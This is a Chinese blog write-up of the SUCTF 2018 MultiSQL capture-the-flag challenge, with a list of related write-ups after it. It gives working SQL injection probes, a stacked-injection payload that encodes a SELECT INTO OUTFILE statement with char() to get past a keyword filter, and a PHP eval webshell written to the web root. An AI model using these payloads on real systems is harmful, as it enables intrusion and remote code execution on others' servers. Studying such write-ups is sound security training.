[SUCTF 2018]MultiSQL MYSQL 预处理写

最新推荐文章于 2024-08-21 16:45:54 发布
最新推荐文章于 2024-08-21 16:45:54 发布
阅读量806 收藏 8
点赞数 5
分类专栏: BUUctf 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134974968
版权

首先这道题需要预处理写马 之前在ctfshow中学习过预处理

我们来看看

CTFSHOW -SQL 注入-CSDN博客

首先我们开始判断是否存在注入

2^(if(1=0,1,0))

2^(if(ascii(mid(user(),1,1))>0,0,1))

判断出存在sql注入

然后我们开始fuzz  发现 select ,union 都没了

但是我们如果 ; 发现可以闭合 所以这里是存在堆叠注入的

但是是没有回显的

1;show databases;

所以我们看看能不能写木马

select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php

这个是我们的木马

然后我们进行预处理

但是这里select 被过滤了
 
所以我们使用char 拼接绕过

str = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str = len(str)
for i in range(0,len_str):
    if i==0:
        print('char(%s' %ord(str[i]),end='')
    else:
        print(',%s' %ord(str[i]),end='')
print(')')

char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

然后直接执行

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare abcd from @sql;execute abcd;

这里就实现了绕过 并且执行了命令

/favicon/shell.php

即可实现

双层小牛堡
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 656
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 265
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理sql
[SUCTF 2018]MultiSQL
qq_45691294的博客
10-10 1428
打开题目,是一个页面,只有登录 注册功能可以正常使用 先注册一个账号,注册后自动登录,登录之后看到 在用户信息处可以查看到自己的信息 编辑头像处可以上传头像图片,可能存在文件上传漏洞 前端对文件后缀名进行了过滤,但是上传php文件,存入的依旧是图片文件 那再看看刚才的查看信息的页面,发现url如下 http://e0063ae7-b2ce-42cd-bf4b-9341c0e87bf9.node3.buuoj.cn/user/user.php?id=2 将id的参数改为1 存在越权,也可能存在SQL
[SUCTF 2018]MultiSQL(mysql预编译)
paidx0
07-12 371
[SUCTF 2018]MultiSQL(mysql预编译)
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1016
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后入webshell,最后得flag,反过来分析,通过上传文件给了一个可读权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有入权限呢,因为文件上传都是传到了这个目录的里面,所以有可的权限。
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 406
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
python3 mysql 预处理补丁
02-08
python3对mysql预处理支持并不是很好,网上很多人说python并不支持mysql预处理,其实mysql官方是有提供支持的,但是依然不友好,所以本人修改源码提供了补丁,以期python3能像php那样支持mysql预处理
PHP MySQL 预处理语句
01-03
预处理语句对于防止 MySQL 注入是非常有用的。 预处理语句及绑定参数 预处理语句用于执行多个相同的 SQL 语句,并且执行效率更高。 预处理语句的工作原理如下: 预处理:创建 SQL 语句模板并发送到数据库。预留的值...
理解Mysql prepare预处理语句
09-10
MySQL PREPARE预处理语句详解】 MySQL的PREPARE预处理语句是一种提高数据库操作性能和安全性的重要工具,尤其适用于需要重复执行相同结构但参数不同的SQL语句的情况。预处理语句的工作原理是先定义一个SQL模板,...
PHP MySQL 预处理语句:读取数据:Where子句.md
06-13
### PHP MySQL 预处理语句与数据读取 #### 一、PHP MySQL 预处理语句 在 PHP 中使用 MySQL 预处理语句(Prepared Statements)是一种非常推荐的方法来执行数据库操作,特别是在涉及到用户输入的情况下。预处理语句...
MYSQL C API预处理语句
04-04
MySQL C API 预处理语句是MySQL数据库与C语言交互的一种方式,它允许开发者创建、准备、执行和重用SQL语句,提高了代码的安全性和效率。预处理语句能够防止SQL注入攻击,因为它们在执行之前会被解析和编译,参数化值...
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 394
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 268
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2357
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
buuctf-web-[SUCTF 2018]MultiSQL1
mlws1900的博客
03-07 498
可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)mysqli_multi_query() 执行的sql语句,其可以执行一个或多个针对数据库的查询,多个查询用分号进行分隔,也就存在堆叠注入。存在各种限制,select,union,直接用char绕过(太菜,用其他绕过马失败)注册一个账号,注册admin提示用户存在,可能有二次注入,注册admin'上传点目前没啥用,从注入点进行操作,尝试读文件。
BUUCTF:[SUCTF2018]single dog
末初的CSDN博客
11-03 2311
题目地址:https://buuoj.cn/challenges#[SUCTF2018]single%20dog attachment.jpg binwalk分析,foremost分离 aaencode编码 AAEncode:http://www.atoolbox.net/Tool.php?Id=703 flag{happy double eleven}
MySQL对JSON数据类型的处理
最新发布
cesske的博客
08-21 331
MySQL从5.7版本开始提供了对JSON数据类型的支持,‌使得MySQL能够直接存储和管理JSON格式的数据。‌这使得在数据库中处理JSON数据变得更为方便和高效。‌以下是一些常用的处理JSON数据的函数和操作:‌。通过这些操作和函数,‌MySQL允许你灵活地处理JSON数据,‌使得在数据库层面进行复杂的数据操作成为可能。4.‌使用JSON_EXTRACT提取JSON字段。9.‌删除JSON中的键值对。8.‌替换JSON中的值。10.‌搜索JSON数据。2.‌插入JSON数据。6.‌更新JSON数据。
mysql预处理
05-26
MySQL预处理是一种提高SQL查询性能和安全性的技术。它通过将SQL语句分为两个部分来实现:预处理和执行。预处理阶段将SQL语句发送到MySQL服务器,MySQL服务器将其解析并进行语法分析,然后将其编译成一种内部格式。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值